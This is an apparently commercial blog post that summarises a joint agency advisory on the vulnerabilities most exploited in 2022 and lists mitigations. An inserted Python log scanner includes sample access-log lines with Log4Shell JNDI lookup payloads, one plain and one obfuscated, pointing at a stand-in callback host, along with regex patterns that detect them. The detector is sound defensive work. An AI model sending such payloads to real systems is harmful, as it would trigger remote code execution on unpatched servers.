Top Vulnerabilities Exploited By Cybercriminals


In 2022, cybercriminals targeted unpatched, internet-facing systems and older software vulnerabilities, frequently using publicly available proof-of-concept (PoC) exploit code. These actors had the most success exploiting known vulnerabilities within the first two years of their disclosure: as software is patched or upgraded, the value of an existing vulnerability falls. Timely patching of software applications therefore reduces how useful a vulnerability is to attackers.

According to Ravin Prasad, CEO of Cybernetic Global Intelligence, a globally accredited cybersecurity support service, patching helps decrease the pace of hacking by cybercriminals and forces them to pursue more time-consuming and costly methods. These may include conducting software supply chain operations or developing zero-day exploits.

Malicious threat actors commonly prioritise exploiting globally prevalent vulnerabilities, and they develop tools to exploit other widespread, critical, publicly known vulnerabilities. Cybercriminals also give higher priority to vulnerabilities prevalent in their targets’ networks. For several CVEs, exploitation takes the form of a malicious web request carrying unique signatures that can only be detected using deep packet inspection. To counter these threats, a group of cybersecurity agencies co-authored and issued a joint advisory. These agencies include the following:

  • Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) from the USA.
  • The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
  • Canadian Centre for Cyber Security (CCCS)
  • New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand
  • National Cyber Security Centre

What Are the Top Exploited Vulnerabilities?

The top vulnerabilities that were routinely exploited by cybercriminals in 2022 include:

CVE-2018-13379: Affecting Fortinet SSL VPNs, this vulnerability was also routinely exploited in 2020 and 2021. These incidents showed that many organisations remained vulnerable to cybercriminals because they did not patch their software applications in a timely manner.

CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523: These ProxyShell vulnerabilities affect Microsoft Exchange email servers. Chained together, they give a remote actor the ability to execute arbitrary code. The flaws are located in the Microsoft Client Access Service (CAS), which commonly runs on port 443 in Microsoft Internet Information Services (IIS). Because CAS lets users access their email from mobile devices and web browsers, it is frequently exposed to the internet.

CVE-2021-40539: This vulnerability allows remote code execution in Zoho ManageEngine ADSelfService Plus and was linked to the use of an outdated third-party dependency. It was exploited in late 2021 and continued to be exploited throughout 2022.

CVE-2021-26084: This vulnerability affects Atlassian Confluence Server and Data Center, a web-based tool used by governments and private companies. It allows a cybercriminal to run arbitrary code on vulnerable systems. It became one of the most exploited vulnerabilities after a PoC was released within a week of its disclosure, and it was exploited en masse by cybercriminals in September 2021.

CVE-2021-44228: Known as Log4Shell, this vulnerability affects Apache’s Log4j library, an open-source logging framework that is embedded in many products. A cybercriminal exploits it by submitting a specially crafted request to a vulnerable system, which leads to the execution of arbitrary code. The request lets the cybercriminal take control of the system and then steal information, run ransomware, or carry out other malicious activity. Exploitation began after the vulnerability was disclosed in December 2021 and continued unabated through the first half of 2022.
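The "malicious web request carrying unique signatures" described earlier and the Log4Shell request above both leave traces in ordinary web-server access logs. As an added defender-side example (not part of the original article or the joint advisory), the Python below scans constructed access-log lines for the JNDI lookup prefix, first collapsing the case and default-value lookups commonly used to hide it; the IP addresses, host names and log lines are all constructed.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not taken from the original article).
# Line 2 carries a plain JNDI lookup in the query string; line 3 hides the same
# lookup behind nested ${lower:...} lookups in the User-Agent; line 4 is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:13:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Dec/2021:13:02:15 +0000] "GET /login?user=${jndi:ldap://callback.example.invalid/a} HTTP/1.1" 200 88 "-" "curl/7.79"
203.0.113.9 - - [10/Dec/2021:13:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://callback.example.invalid/b}"
203.0.113.10 - - [10/Dec/2021:13:02:22 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

# ${lower:X} / ${upper:X} lookups only change the case of X.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}", re.IGNORECASE)
# ${name:-default} lookups resolve to "default" when "name" is undefined,
# so ${::-j} is another way to spell the single letter j.
_DEFAULT_LOOKUP = re.compile(r"\$\{:*[^:}$]*:-([^}$]*)\}")
# The lookup prefix that triggers the remote JNDI fetch in vulnerable Log4j.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse innermost obfuscation lookups until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def scan_log(log: str) -> List[Dict[str, object]]:
    """Return one record per log line whose normalized form contains ${jndi:."""
    hits = []
    for lineno, line in enumerate(log.splitlines(), 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append({"line": lineno, "src": line.split()[0], "normalized": norm})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['src']}: {hit['normalized']}")
```

A real deployment would feed the normalized line to a SIEM rule or WAF signature rather than printing it; the normalization step is what keeps a signature written for `${jndi:` from being trivially bypassed.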

CVE-2022-22954, CVE-2022-22960: This pair of vulnerabilities allows privilege escalation, RCE, and authentication bypass in VMware products. Using them, a cybercriminal can trigger a server-side template injection that results in remote code execution. Exploitation of these vulnerabilities began in early 2022 and continued throughout the year.

CVE-2022-1388: This vulnerability enables a cybercriminal to bypass iControl REST authentication on F5 BIG-IP security software.

CVE-2022-30190: This vulnerability affects the Microsoft Support Diagnostic Tool in Windows, and a cybercriminal can exploit it to take control of an affected system.

CVE-2022-26134: This vulnerability affects Atlassian Confluence Server and Data Center and was publicly disclosed in June 2022. It follows an older Confluence vulnerability (CVE-2021-26084), which cybercriminals also exploited in 2022.

Note: In addition to the above, you may read our blog to learn about more dangerous vulnerabilities in 2023.

How to Mitigate These Vulnerabilities

The recommendations issued by the advising cybersecurity agencies to mitigate these CVEs, applicable to every stakeholder, are as follows:

  • Identify routinely exploited classes of vulnerabilities.
  • Identify the root cause of the vulnerabilities to find out if there are any design flaws.
  • Implement suitable mitigations to eliminate the vulnerabilities.
  • Implement secure design practices at each stage of the SDLC.
  • Enhance product security by eliminating default passwords and making additional configuration changes.
  • Implement a centralised patch management system.
  • Use tools such as endpoint detection and response, network protocol analysers, and web application firewalls.
  • Allow business leaders to take proactive steps and become security stakeholders.
  • Update operating systems, software applications, and firmware in a timely manner.
  • Replace any end-of-life software that is not supported by the vendor.
  • Perform automated asset discovery routinely to identify and catalogue systems, hardware, and software.
  • Perform secure system backups.
  • Implement a phishing-resistant multifactor authentication procedure for all users.
  • Review, validate, or eliminate privileged accounts.
  • Configure and secure all internet-facing devices, encrypt network traffic, and disable unnecessary ports and protocols.

Conclusion

In addition to the above-mentioned mitigation activities, you can hire the services of a globally accredited cybersecurity company, such as Cybernetic Global Intelligence. Cybersecurity professionals can perform a comprehensive review of your digital assets and suggest remedies. For details, call us at 1300 292 376, send an email to Contact@cybernetic-gi.com, or visit www.cybernetic-gi.com.
